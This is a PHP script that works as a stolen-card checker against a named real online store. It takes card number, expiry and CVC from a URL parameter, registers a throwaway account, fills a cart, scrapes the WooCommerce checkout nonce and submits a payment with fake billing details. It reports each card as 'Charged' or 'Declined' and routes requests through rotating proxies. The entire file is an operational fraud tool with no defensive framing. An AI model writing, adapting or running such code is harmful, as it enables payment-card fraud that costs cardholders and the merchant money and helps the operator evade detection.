<?php  
function generateRandomEmail() {  
    return substr(str_shuffle('abcdefghijklmnopqrstuvwxyz'), 0, 10) . '@gmail.com';  
}  
  
$site = "https://www.habitatstoreskc.org";  

// Load proxies from proxy.txt
function loadProxies() {
    $file = 'proxy.txt';
    if (!file_exists($file)) {
        return [];
    }
    $lines = file($file, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
    $proxies = [];
    foreach ($lines as $line) {
        $line = trim($line);
        if ($line && strpos($line, '@') !== false) {
            $proxies[] = $line;
        }
    }
    return $proxies;
}

$proxyList = loadProxies();

function initCurl($url, $useCookies = true) {  
    global $proxyList;
    
    static $cookieJar = null;  
    if ($cookieJar === null) {  
        $cookieJar = tempnam(sys_get_temp_dir(), 'cookie_');  
    }  
  
    $ch = curl_init();  
    curl_setopt($ch, CURLOPT_URL, $url);  
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);  
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);  
    curl_setopt($ch, CURLOPT_HTTPHEADER, ['User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36']);  
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);  
    curl_setopt($ch, CURLOPT_TIMEOUT, 30);

    if ($useCookies) {  
        curl_setopt($ch, CURLOPT_COOKIEJAR, $cookieJar);  
        curl_setopt($ch, CURLOPT_COOKIEFILE, $cookieJar);  
    }  

    // Rotating proxy if available
    if (!empty($proxyList)) {
        $proxyStr = $proxyList[array_rand($proxyList)];
        if (strpos($proxyStr, '@') !== false) {
            list($auth, $hostPort) = explode('@', $proxyStr);
            list($proxyUser, $proxyPass) = explode(':', $auth);
            list($proxyHost, $proxyPort) = explode(':', $hostPort);
            curl_setopt($ch, CURLOPT_PROXY, $proxyHost . ':' . $proxyPort);
            curl_setopt($ch, CURLOPT_PROXYUSERPWD, $proxyUser . ':' . $proxyPass);
            curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_HTTP);
        }
    }
  
    return $ch;  
}  
  
function getProductButtonValue($site) {  
    $ch = initCurl($site . "/product/lg-electric-clothes-dryer-model-dlex7177wm/");  
    $response = curl_exec($ch);  
    if (!$response) {  
        curl_close($ch);
        return null;
    }  
    curl_close($ch);  
  
    if (preg_match('/name="add-to-cart" value="(\d+)"/', $response, $matches)) {  
        return $matches[1];  
    }  
    return null;  
}  
  
function addToCart($site, $productSlug, $buttonValue) {  
    $ch = initCurl($site . "/product/" . $productSlug . "/");  
    curl_setopt($ch, CURLOPT_POST, true);  
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([  
        'add-to-cart' => $buttonValue,  
    ]));  
    $response = curl_exec($ch);  
    curl_close($ch);  
    return $response;  
}  
  
function getCheckoutNonce($site) {  
    $ch = initCurl($site . "/checkout/");  
    $response = curl_exec($ch);  
    if (!$response) {  
        curl_close($ch);
        return null;
    }  
    curl_close($ch);  
  
    if (preg_match('/woocommerce-process-checkout-nonce" value="(.*?)"/', $response, $matches)) {  
        return $matches[1];  
    }  
    return null;  
}  
  
function signUp($site, $email) {  
    $ch = initCurl($site . "/my-account/");  
    curl_setopt($ch, CURLOPT_POST, true);  
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([  
        'email' => $email,  
        'register' => 'Register'  
    ]));  
    $response = curl_exec($ch);  
    curl_close($ch);  
    return $response;  
}  
  
function checkout($site, $cardDetails, $nonce, $email) {  
    $postData = [  
        'wfacp_timezone' => 'Asia/Calcutta',  
        'wfacp_billing_same_as_shipping' => '0',  
        'wfacp_billing_address_present' => 'yes',  
        'wfob_input_hidden_data' => '{}',  
        'billing_email' => $email,  
        'bwfan_cart_id' => '1311',  
        'billing_first_name' => 'John',  
        'billing_last_name' => 'Doe',  
        'billing_phone' => '02528383489',  
        'billing_address_1' => 'Po box 119',  
        'billing_address_2' => 'N/A',  
        'billing_city' => 'Ntmtmt',  
        'billing_postcode' => '10008',  
        'billing_country' => 'US',  
        'billing_state' => 'NY',  
        'shipping_first_name' => 'John',  
        'shipping_last_name' => 'Doe',  
        'shipping_address_1' => 'Po box 119',  
        'shipping_address_2' => 'N/A',  
        'shipping_city' => 'Ntmtmt',  
        'shipping_postcode' => '10008',  
        'shipping_country' => 'US',  
        'shipping_state' => 'NY',  
        'payment_method' => 'authnet',  
        'authnet-card-number' => $cardDetails['number'],  
        'authnet-card-expiry' => str_replace(' / ', '/', $cardDetails['expiry']),  
        'authnet-card-cvc' => $cardDetails['cvc'],  
        'woocommerce-process-checkout-nonce' => $nonce,  
        '_wp_http_referer' => '/?wc-ajax=update_order_review&wfacp_id=22120&wfacp_is_checkout_override=yes',  
        'ship_to_different_address' => 'on',  
        'wc_order_attribution_source_type' => 'typein',  
        'wc_order_attribution_referrer' => '(none)',  
        'shipping_method[0]' => 'flat_rate:4',  
        'bwfan_user_consent' => '1',  
        'terms' => '1',  
        '_woo_additional_terms' => '1'  
    ];  
    
    $ch = initCurl($site . "/?wc-ajax=checkout");  
    curl_setopt($ch, CURLOPT_POST, true);  
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($postData));  
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);  
    $response = curl_exec($ch);  
    curl_close($ch);  
    return $response;  
}  

// Set JSON header
header('Content-Type: application/json');

// === MAIN EXECUTION ===
if (isset($_GET['cc'])) {  
    $cardDetails = explode('|', $_GET['cc']);  
    if (count($cardDetails) < 4) {  
        echo json_encode([
            "response" => "Invalid card format. Use: card_number|MM|YYYY|CVC",
            "status" => "Declined"
        ]);
        exit;
    }  
  
    $card = [  
        'number' => trim($cardDetails[0]),  
        'expiry' => trim($cardDetails[1]) . ' / ' . trim($cardDetails[2]),  
        'cvc' => trim($cardDetails[3]),  
    ];  
  
    $email = generateRandomEmail();  
  
    // Execute all steps
    $registerResponse = signUp($site, $email);  
    $buttonValue = getProductButtonValue($site);  
    
    if (!$buttonValue) {  
        echo json_encode([
            "response" => "Product Button Value Not Found",
            "status" => "Declined"
        ]);
        exit;
    }  
    
    $cartResponse = addToCart($site, "super-party-pack-ham-roll-29-99", $buttonValue);  
    $nonce = getCheckoutNonce($site);  
    
    if (!$nonce) {  
        echo json_encode([
            "response" => "Checkout Nonce Not Found",
            "status" => "Declined"
        ]);
        exit;
    }  
    
    $checkoutResponse = checkout($site, $card, $nonce, $email);  
    
    // Parse checkout response - SIMPLIFIED to avoid JSON errors
    $status = "Declined";
    $responseMessage = "Payment processing completed";
    
    if ($checkoutResponse) {
        // Try to parse as JSON first
        $checkoutData = @json_decode($checkoutResponse, true);
        
        if (is_array($checkoutData)) {
            // Successfully parsed JSON
            if (isset($checkoutData['messages'])) {
                $messages = strip_tags($checkoutData['messages']);
                $messages = trim(preg_replace('/\s+/', ' ', $messages));
                $responseMessage = $messages;
            }
            
            // Determine status
            if (isset($checkoutData['result'])) {
                if ($checkoutData['result'] === 'success') {
                    $status = "Charged";
                } elseif ($checkoutData['result'] === 'failure') {
                    $status = "Declined";
                }
            }
        } else {
            // If not JSON, check if it contains success/failure indicators
            if (strpos($checkoutResponse, 'result":"success') !== false || 
                strpos($checkoutResponse, 'order-received') !== false ||
                strpos($checkoutResponse, 'Thank you') !== false) {
                $status = "Charged";
                $responseMessage = "Transaction approved";
            } else if (strpos($checkoutResponse, 'result":"failure') !== false ||
                      strpos($checkoutResponse, 'declined') !== false) {
                $status = "Declined";
                $responseMessage = "Transaction declined";
            } else {
                // Default response if we can't parse
                $responseMessage = "Payment processed - check gateway for details";
            }
        }
    }
    
    // Final output - ALWAYS return valid JSON
    echo json_encode([
        "response" => $responseMessage,
        "status" => $status
    ]);
    
} else {  
    echo json_encode([
        "response" => "No card details provided. Use ?cc=card_number|MM|YYYY|CVC",
        "status" => "Declined"
    ]);
} 
?>